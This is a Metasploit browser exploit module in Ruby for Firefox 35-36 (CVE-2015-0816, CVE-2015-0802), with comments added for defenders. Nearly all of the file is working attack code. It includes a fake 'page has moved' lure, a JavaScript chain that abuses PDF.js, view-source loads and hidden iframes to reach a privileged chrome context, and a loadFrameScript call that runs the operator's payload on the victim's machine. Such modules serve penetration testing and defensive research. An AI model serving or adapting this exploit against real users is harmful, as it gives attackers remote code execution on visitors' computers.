Path: blob/master/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for Firefox 35-36 (CVE-2015-0816 and CVE-2015-0802,
# listed under 'References'). The server side only builds and serves a single
# HTML page; the script in that page runs in the visiting browser and, once
# the user clicks anywhere on the page, loads the payload returned by
# run_payload (FirefoxPrivilegeEscalation mixin) via messageManager.loadFrameScript.
#
# Notes for defenders, all taken from the code below:
#   * 'BrowserRequirements' gates delivery on a Firefox user-agent whose major
#     version is 35 or 36; any other version is never sent the exploit page.
#   * Apart from the CONTENT option and one random property name the served
#     page is static, so the data:application/pdf <object>, the view-source:
#     loads and the chrome://browser/content/browser.xul string all appear
#     verbatim in the HTTP response body.
#   * Rank is ManualRanking, matching the user-interaction requirement.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Module metadata plus the single CONTENT option (optional HTML placed
  # inside <body>; #default_html is used when it is unset).
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Firefox PDF.js Privileged Javascript Injection',
      'Description'    => %q{
        This module gains remote code execution on Firefox 35-36 by abusing a
        privilege escalation bug in resource:// URIs. PDF.js is used to exploit
        the bug. This exploit requires the user to click anywhere on the page to
        trigger the vulnerability.
      },
      'Author'         => [
        'Unknown',        # PDF.js injection code was taken from a 0day
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev'            # copypasta monkey, CVE-2015-0802
      ],
      'DisclosureDate' => '2015-03-31',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-0816'], # pdf.js can load chrome://
          ['CVE', '2015-0802']  # can access messageManager property in chrome window
        ],
      'Targets'        => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch'     => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget'  => 0,
      # Only clients reporting Firefox major version 35 or 36 are served.
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(35, 36) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
    ])
  end

  # BrowserExploitServer callback for a client that passed the requirements:
  # logs once and returns the page built by #html. `request` and `target_info`
  # are not used.
  def on_request_exploit(cli, request, target_info)
    print_status('Sending exploit...')
    send_response_html(cli, html)
  end

  # The complete response document: operator-supplied CONTENT (or the lure
  # from #default_html) followed by the script from #js. CONTENT is emitted
  # verbatim, without escaping.
  def html
    "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+
    "<script>#{js}</script></body></html>"
  end

  # Lure shown when CONTENT is unset; the script only proceeds after a click
  # anywhere on the page (the window.onclick handler in #js).
  def default_html
    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
  end

  # Builds the client-side script. `key` is the random property name under
  # which the payload is embedded in the serialized `opts` object. `frame` and
  # `r` are generated here but never interpolated into the script.
  #
  # Overview of the script in the heredoc (emitted verbatim, so it carries no
  # comments of its own -- _() also strips "//" comments from the functions it
  # stringifies):
  #   xml2string / __proto / get_data  helpers that _() appends, as source
  #                                    text, to every snippet it builds
  #   _(s, template, value)            converts a function to its body text,
  #                                    substitutes template -> value, appends
  #                                    the helpers, strips "//" comments and
  #                                    ends the text with ";undefined"
  #   get(path, callback, timeout, template, value)
  #                                    builds js_call1 (installs the
  #                                    window.onclick handler that opens `path`
  #                                    and loads the payload taken from `opts`)
  #                                    and js_call2 (runs `callback`), and
  #                                    applies each to the i2 frame's location
  #                                    setter through sandboxContext, js_call2
  #                                    after `timeout` ms
  #   get_sandbox_context()            polled every 200 ms from object.onload;
  #                                    once a view-source: window is found it
  #                                    stops the poll and inserts a hidden
  #                                    iframe that publishes
  #                                    window.sandboxContext(cmd), an eval helper
  #   top level                        creates the hidden XML iframe "i", the
  #                                    full-viewport PDF iframe "i2", the empty
  #                                    PDF blob and the <object>, then polls
  #                                    (20 ms) until sandboxContext exists and
  #                                    calls get() with the browser.xul chrome
  #                                    URL and an empty callback
  # The template passed at the top level is "%URL%" while js_call1 uses the
  # hard-coded "%url%" placeholder; the callback there is empty, so the case
  # difference has no effect.
  def js
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    <<-EOJS
      function xml2string(obj) {
        return new XMLSerializer().serializeToString(obj);
      }

      function __proto(obj) {
        return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
      }

      function get(path, callback, timeout, template, value) {
        callback = _(callback);
        if (template && value) {
          callback = callback.replace(template, value);
        }
        js_call1 = 'javascript:' + _(function() {
          try {
            done = false;
            window.onclick = function() {
              if (done) { return; } done = true;
              q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
              setTimeout(function(){
                q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';

                setTimeout(function(){
                  var opts = #{JSON.unparse(opts)};
                  var key = opts['#{key}'];
                  q.messageManager.loadFrameScript('data:,'+key, false);
                  setTimeout(function(){
                    q.close();
                  }, 100)
                }, 100)
              }, 100);
            }
          } catch (e) {
            history.back();
          }
          undefined;
        }, "%url%", path);
        js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
        sandboxContext(_(function() {
          p = __proto(i.contentDocument.styleSheets[0].ownerNode);
          l = p.__lookupSetter__.call(i2.contentWindow, 'location');
          l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
        }));
        setTimeout((function() {
          sandboxContext(_(function() {
            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
            l = p.__lookupSetter__.call(i2.contentWindow, 'location');
            l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
          }));
        }), timeout);
      }

      function get_data(obj) {
        data = null;
        try {
          data = obj.document.documentElement.innerHTML;
          if (data.indexOf('dirListing') < 0) {
            throw new Error();
          }
        } catch (e) {
          if (this.document instanceof XMLDocument) {
            data = xml2string(this.document);
          } else {
            try {
              if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
                data = this.document.body.firstChild.textContent;
              } else {
                throw new Error();
              }
            } catch (e) {
              try {
                if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
                  return null;
                } else {
                  throw new Error();
                }
              } catch (e) {
                ;;
              }
            }
          }
        }
        return data;
      }

      function _(s, template, value) {
        s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
        s = s.substring(0, s.length - 1);
        if (template && value) {
          s = s.replace(template, value);
        }
        s += __proto;
        s += xml2string;
        s += get_data;
        s = s.replace(/\\s\\/\\/.*\\n/g, "");
        s = s + ";undefined";
        return s;
      }

      function get_sandbox_context() {
        if (window.my_win_id == null) {
          for (var i = 0; i < 20; i++) {
            try {
              if (window[i].location.toString().indexOf("view-source:") != -1) {
                my_win_id = i;
                break;
              }
            } catch (e) {}
          }
        };
        if (window.my_win_id == null)
          return;
        clearInterval(sandbox_context_i);
        object.data = 'view-source:' + blobURL;
        window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
        object.data = 'data:text/html,<'+'html/>';
        window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
          '"position:absolute; left:-9999px;" onload = "'+_(function(){
            window.wrappedJSObject.sandboxContext=(function(cmd) {
              with(importFunction.constructor('return this')()) {
                return eval(cmd);
              }
            });
          }) + '"/>');
      }

      var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
      var i = document.createElement("iframe");
      i.id = "i";
      i.style=HIDDEN;
      i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
      document.documentElement.appendChild(i);
      i.onload = function() {
        if (this.contentDocument.styleSheets.length > 0) {
          var i2 = document.createElement("iframe");
          i2.id = "i2";
          i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
          i2.height = window.innerHeight+'px';
          i2.width = window.innerWidth+'px';
          i2.src = "data:application/pdf,";
          document.documentElement.appendChild(i2);
          pdfBlob = new Blob([''], {
            type: 'application/pdf'
          });
          blobURL = URL.createObjectURL(pdfBlob);
          object = document.createElement('object');
          object.style=HIDDEN;
          object.data = 'data:application/pdf,';
          object.onload = (function() {
            sandbox_context_i = setInterval(get_sandbox_context, 200);
            object.onload = null;
            object.data = 'view-source:' + location.href;
            return;
          });
          document.documentElement.appendChild(object);
        } else {
          this.contentWindow.location.reload();
        }
      }

      document.body.style.height = window.innerHeight+'px';

      var kill = setInterval(function() {
        if (window.sandboxContext) {
          var f = "chrome://browser/content/browser.xul";
          get(f, function() {}, 0, "%URL%", f);
          clearInterval(kill);
        } else {
          return;
        }
      },20);

    EOJS
  end
end